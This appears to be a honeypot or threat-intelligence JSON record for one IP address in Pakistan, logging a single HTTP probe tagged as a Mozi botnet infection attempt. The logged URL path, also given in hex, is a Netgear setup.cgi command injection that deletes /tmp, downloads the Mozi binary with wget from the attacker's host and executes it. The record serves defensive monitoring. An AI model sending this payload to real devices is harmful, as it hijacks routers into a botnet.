{"ip":"119.30.117.62","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"residential ISP"},"first_seen":"2026-06-15T21:08:58","last_seen":"2026-06-15T21:08:58","events_24h":0,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"","city":"","lat":30.0,"lon":70.0,"asn":58470,"org":"IX Peering for Mobilink and Link Direct International."},"source_domain":"static-host119-30-117-62.link.net.pk","known_scanners":[],"scanner_tag":{"key":"peeringdb:as58470","label":"Mobilink Peering","category":"isp","url":"https://www.peeringdb.com/asn/58470"},"cve_matches":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2181},"user_agents":[],"timeline":[{"date":"2026-06-15","count":1}],"recent_events":[{"timestamp":"2026-06-15T21:08:58","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://119.30.117.62:57777/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","summary":"","payload_hex":"474554202f73657475702e6367693f6e6578745f66696c653d6e6574676561722e63666726746f646f3d737973636d6426636d643d726d2b2d72662b2f746d702f2a3b776765742b687474703a2f2f3131392e33302e3131372e36323a35373737372f4d6f7a692e6d2b2d4f2b2f746d702f6e6574676561723b73682b6e65746765617226637572706174683d2f2663757272656e7473657474696e672e68746d3d3120485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:MfPVrSTtf1CKflf12NeQlyghEBM=","ja3":"","session":"119c1edb-72d5-4409-83e1-938654fa886e","seq":1,"duration_ms":101,"bytes_in":176,"bytes_out":78}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://119.30.117.62:57777/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-06-20T07:53:24.820329+00:00"}